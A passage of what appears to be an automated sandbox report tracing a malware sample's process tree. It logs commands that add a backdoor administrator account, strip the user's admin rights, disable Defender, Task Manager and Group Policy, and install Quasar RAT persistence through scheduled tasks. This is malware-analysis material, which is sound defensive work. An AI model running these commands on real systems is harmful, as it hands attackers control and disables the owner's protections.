  2⤵
  - System Location Discovery: System Language Discovery
  PID:4936
- - C:\Windows\SysWOW64\net.exe
    net user OWN3DbyHXM4TO Test
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4740
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user OWN3DbyHXM4TO Test
      4⤵
      System Location Discovery: System Language Discovery
      PID:4800
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "OWN3DbyHXM4TO" /add
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4420
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators "OWN3DbyHXM4TO" /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4056
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "OWN3DbyHXM4TO" /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:2060
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
  2⤵
  - Indicator Removal: Network Share Connection Removal
  - System Location Discovery: System Language Discovery
  PID:1736
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators "Admin" /delete
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
      4⤵
      System Location Discovery: System Language Discovery
      PID:1008
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3292
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4344
- C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe
  "C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3400
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3920
- - C:\Windows\system32\SubDir\Client.exe
    "C:\Windows\system32\SubDir\Client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SendNotifyMessage
    PID:2516
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KF5uPsUneLtW.bat" "
      4⤵
      PID:1252
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:2756
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2620
    - - C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3748
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2936
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Z1Bb9gH6INBC.bat" "
        6⤵
        
        PID:1584
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:1848
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4472
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3536
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n0RkKomkwtbn.bat" "
        8⤵
        
        PID:3636
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:2620
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1584
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:240
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\by3YoXk0GScM.bat" "
        10⤵
        
        PID:1428
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:956
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1612
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:2172
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l2ZeeZHFFyWq.bat" "
        12⤵
        
        PID:1408
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:1820
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4232
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:4816
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nVPk66p7Wt7z.bat" "
        14⤵
        
        PID:3116
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:4736
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4320
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3900
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FOMkra3GExMq.bat" "
        16⤵
        
        PID:4680
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:1856
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3156
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3636
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DJmkwWPKT4aR.bat" "
        18⤵
        
        PID:5028
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:5008
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3492
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:2828
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        20⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\j5s3D7gxSi8T.bat" "
        20⤵
        
        PID:2620
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:1700
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4024
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:2072
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        22⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vvxveaaWOb0S.bat" "
        22⤵
        
        PID:880
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:3532
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4212
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        23⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:5012
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        24⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QPXZdBHWYyF6.bat" "
        24⤵
        
        PID:2976
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        25⤵
        
        PID:768
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:340
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        25⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:4848
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        26⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rrRPI2NX6YrO.bat" "
        26⤵
        
        PID:232
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        27⤵
        
        PID:3012
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2860
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        27⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:2120
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        28⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TQjXjDDFdxPY.bat" "
        28⤵
        
        PID:4480
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        29⤵
        
        PID:1976
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2664
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        29⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3472
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        30⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6B9kycXjNkSW.bat" "
        30⤵
        
        PID:248
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        31⤵
        
        PID:3528
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        31⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:484
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:872
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1908
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4672
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2084
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5060
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:480
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4104
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:236
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of SendNotifyMessage
    PID:2024
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc976d3cb8,0x7ffc976d3cc8,0x7ffc976d3cd8
      4⤵
      PID:1548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:2
      4⤵
      PID:2316
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:772
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
      4⤵
      PID:2388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
      4⤵
      PID:2868
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
      4⤵
      PID:724
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
      4⤵
      PID:764
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
      4⤵
      PID:244
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
      4⤵
      PID:1088
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4296 /prefetch:8
      4⤵
      PID:572
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4928 /prefetch:8
      4⤵
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:4412
  - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5824 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2308
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
      4⤵
      PID:1792
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4948
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
      4⤵
      PID:3920
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
      4⤵
      PID:980
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
      4⤵
      PID:3064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
      4⤵
      PID:3892
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,9476072778542294392,11979505365225073215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1340 /prefetch:1
      4⤵
      PID:3584
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start https://discord.gg/8eGVMdaD
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1536
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/8eGVMdaD
    3⤵
    PID:4992
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x120,0x130,0x7ffc976d3cb8,0x7ffc976d3cc8,0x7ffc976d3cd8
      4⤵
      PID:3824
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,3782535824194974709,10684943795347908891,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
      4⤵
      PID:3484
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
